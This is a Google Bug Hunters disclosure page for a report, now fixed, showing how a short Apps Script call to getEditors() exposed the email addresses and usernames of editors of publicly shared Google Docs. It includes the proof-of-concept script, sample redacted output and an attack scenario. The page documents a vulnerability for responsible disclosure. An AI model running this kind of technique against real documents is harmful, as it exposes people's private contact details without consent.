Skip to Content (Press Enter)
Google
Bug Hunters
Loophole to see the editors of a Google Document with no granted access(owner/editor) with just the fileid ( can be obtained from publicly shared links with 0 access )
Reported by:
Abhishek Mathur
Google VRP
triaged
16:34 | Nov 4, 2024
accepted
23:56 | Nov 4, 2024
fixed
12:46 | Dec 6, 2024
reward decided
$15,000
Summary:
Loophole to see the editors of a Google Document with no granted access(owner/editor) with just the fileid ( can be obtained from publicly shared links with 0 access )
Program:
Google VRP
URL:
https://docs.google.com/document/d/1o6sMyyoEX9b8bN2OJUmdR6rnehxbce_SmRk7xCYJ-UI
Vulnerability type:
Sensitive data exposure
Details
Note: I have gone though
https://bughunters.google.com/learn/invalid-reports/5374985771941888
and would like to first say counter to any possible confusions For
https://bughunters.google.com/learn/invalid-reports/google-products/4983708328919040/ability-to-map-email-addresses-to-profile-names
, I want to say that I am able to get the email addresses when they should not be visible so this is not applicable here
You can do this with any publicly shared Google Docs Document I am taking this for an example:
https://docs.google.com/document/d/1o6sMyyoEX9b8bN2OJUmdR6rnehxbce_SmRk7xCYJ-UI
Screenshot of exploit attached along with how its not visible in Google Docs UI This was shared to me via a link and i dont have editor/viewer/owner access on my google account The email, username and userloginid of all the editors of this document was not visible via the Webpage opened by the following link But i was able to view the same of all the editors using this loophole
Create a new Google Docs Document under your google account 
Open Google apps script of that sheet
Run the following code
function myFunction() {
  // ANY PUBLICLY VISIBLE GOOGLE DOCS DOCUMENT ID 
  console.log(DocumentApp.openById('1o6sMyyoEX9b8bN2OJUmdR6rnehxbce_SmRk7xCYJ-UI').getEditors().map(f=>{
    return Object.keys(f).filter(z=>typeof f[z]=='function').map(key=>[key,f[key]()])
  }))
}
You can replace 1o6sMyyoEX9b8bN2OJUmdR6rnehxbce_SmRk7xCYJ-UI with any Document Id of publicly shared Google Docs Document with no access to any editor/owner role granted by email based permission
The output was
[ [ [ 'toString', '[REDACTED_USERNAME]@gmail.com' ],
    [ 'getUsername', '[REDACTED_USERNAME]' ],
    [ 'getUserLoginId', '[REDACTED_USERNAME]@gmail.com' ],
    [ 'getEmail', '[REDACTED_USERNAME]@gmail.com' ] ],
  [ [ 'toString', '[REDACTED_USERNAME]@student.nitw.ac.in' ],
    [ 'getUsername', '[REDACTED_USERNAME]' ],
    [ 'getUserLoginId', '[REDACTED_USERNAME]@student.nitw.ac.in' ],
    [ 'getEmail', '[REDACTED_USERNAME]@student.nitw.ac.in' ] ] ]
This information is not visible via google drive too, also if you are not an editor, you should clearly not be able to see the email ids of all the editors , so its a clear cut privacy violation
Attack scenario
Anyone can exploit this for any publicly shared Google Docs Document ( They can get the fileid from the link shared ( public viewing link with no access granting by email ) )
They will be able to get the email, username and userloginid of all the editors of the publicly shared google document even though its not showed in the Google Docs Document UI or Google Drive since the access is not granted explicitly via email address.
This is clearly a violation of the privacy principle as the details of all the editors are hidden when google Docs Document is shared publicly to protect privacy of the sheet editors
登录
使用 Google 账号登录